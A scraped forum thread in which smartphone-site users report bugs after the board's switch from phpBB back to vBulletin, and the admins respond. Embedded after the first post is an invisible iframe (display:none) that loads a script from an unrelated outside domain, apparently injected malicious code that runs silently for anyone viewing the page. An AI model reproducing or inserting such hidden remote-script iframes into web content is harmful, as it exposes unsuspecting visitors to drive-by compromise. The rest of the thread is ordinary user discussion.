+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Comments on change to vbulletin

The only glaring thing I'm seeing right now is the [quote] tag is different between phpbb and vbulletin, so any posts that have quotes aren't formatted correctly anymore. I don't know what the best solution to this would be. I would assume a global find and replace of message contents in the db would be required to fix this. I don't know how doable that is though.

The other thing is the loss of attached images in the threads, but that I remember happening when we went from vbulletin to phpbb.

Besides that it looks like all posts in a thread are being seen again, and the board seems to be responding better than before.

Thanks jimmyjoe and whoever else helped out with the change back to vbulletin!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

Yeah, thanks a lot jimmyjoe and jazz! Everything (in the 2 minutes I've been here) looks great so far!

BTW... vBulletin has a zillion more emoticons available. Are you planning to put them out here for us to use?
    Please visit my picture site: Robert-O-Rama :)

yeehaw...

wow!
    iBug
    mac osx usernew beetle pilotpowerbook operatorsmartphone communicator

The following thread has the thread starter incorrect in the view of the 7135 Discussion forum. It has Xc0m when it should be Markito Burrito, I'm not sure if this problem exists for other threads as well. This is the first thread that I've seen with the incorrect starter.

http://www.smartphonesource.com/vbul...&threadid=3209
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

Originally posted by Robert K.
    Yeah, thanks a lot jimmyjoe and jazz! Everything (in the 2 minutes I've been here) looks great so far!

BTW... vBulletin has a zillion more emoticons available. Are you planning to put them out here for us to use?
    Yeah, we plan on getting those installed also, it was an extremely late night getting all of this converted, so jimmyjoe didn't have time to finish everything.

[QUOTE]Originally posted by alex_mathews
    The only glaring thing I'm seeing right now is the
    tag is different between phpbb and vbulletin, so any posts that have quotes aren't formatted correctly anymore. I don't know what the best solution to this would be. I would assume a global find and replace of message contents in the db would be required to fix this. I don't know how doable that is though.
    Yes, we also noticed this...I'm not quite sure how we will go about fixing it...a little research will be required before doing a global find and replace.

Originally posted by alex_mathews
    The following thread has the thread starter incorrect in the view of the 7135 Discussion forum. It has Xc0m when it should be Markito Burrito, I'm not sure if this problem exists for other threads as well. This is the first thread that I've seen with the incorrect starter.
    thanks for pointing that out... it is very strange.... i haven't come across any other threads that look that way, but please let me know if you see any more.
    --Jazz--

Thanks Alex Matthews for watching my back!
    Hee hee.

Jimmy Joe, Jazz & marctronixx,

Thanks sooooo much for making the change! I feels so good to post, etc. without errors or problems. Ahhhh, I feel like a new man (er, make that "geek").

We appreciate it!

~Markito

Thank you for going back to vB. Version 3.0 is going to knock everyone's socks off.

error message

i dunno what this means, but i just got it when posting 2 seperate threads.

Warning: Server Error in D:wwwqcp6035.comvbulletinadminfunctions.php on line 2277
    iBug

Re: error message

Originally posted by iBug

Warning: Server Error in D:wwwqcp6035.comvbulletinadminfunctions.php on line 2277
    I remember seeing errors like that when vbulletin was previously used here. I don't see it actually causing a problem, besides being slightly annoying.
    www.treobits.com

Small thing....

So far this is cool....I have noticed one minor annoyance...even if you have read all of the post in a topic, it still shows that there are new posts on the index page. If you go into that topic and mark it as read, then it no longer shows new posts. Like I said, just a small thing.

As far as fixing the quotes, I would be happy to try to help fix it. I do have a lot of experience in file conversions and such.

Rob

Re: Small thing....

Originally posted by RobNAZ
    So far this is cool....I have noticed one minor annoyance...even if you have read all of the post in a topic, it still shows that there are new posts on the index page. If you go into that topic and mark it as read, then it no longer shows new posts. Like I said, just a small thing.
    have a lot of experience in file conversions and such.

Rob
    There are other boards talking about this problem on the vbulletin community forums... they are researching to see if it is a poosible bug with this version. I agree, it is rather annoying
    --Jazz--

Re: error message

Originally posted by iBug

This one and subsequent errors like it were being caused by incorrect mail settings in php.ini . I have corrected those settings and we should not see any more errors like that and mail should be working now also...

Thanks and let me know if you see any other problems...
    -=Jimmyjoe=-

Lookin goood. The poster machines will be back in action. Thanks...

Oh When that Shark Bites! LBOCEAN's Avatar

Cleanup

One option (I mentioned in another post) is that when you come across a previous post you've personally made that had a link or image, take the time to clean it up if you can.

Before to long, it will all be back together.

www.treobits.com

Fixing the links that link back into a thread on the board is proving to be very tedious. The ones I've fixed so far in my posts require searching for the linked thread again. I was hoping that the threadid from phpbb would match to vbulletin, but it doesn't unfortunately.
    www.treobits.com

topic updates...

is it just me, or has anyone else noticed that when clicking on "view new posts" the results are off a bit.
    the "last post" time and author is "old". for example i just saw a topic that said the last update was @ 6am by <insert your username here> when in actuality, it had 3 or 4 posts since thenand 5 or 6 hours (maybe more) have gone by.

anyone?

iBug

I just came across a new problem -
    I tried to edit a post, but got an error page - the suggested problems were all n/a - like trying to edit someone else's post, or having my account suspended, etc.

Anyone else?

spamming

i'm getting email from the board telling me there's a new post in a tracked topic and when i click on it and go...
    NO NEW POST is there. just the same ones from before.

is it "hiding" posts again or sending bogus notifications or <insert anomoly here>?

anyone else?
    iBug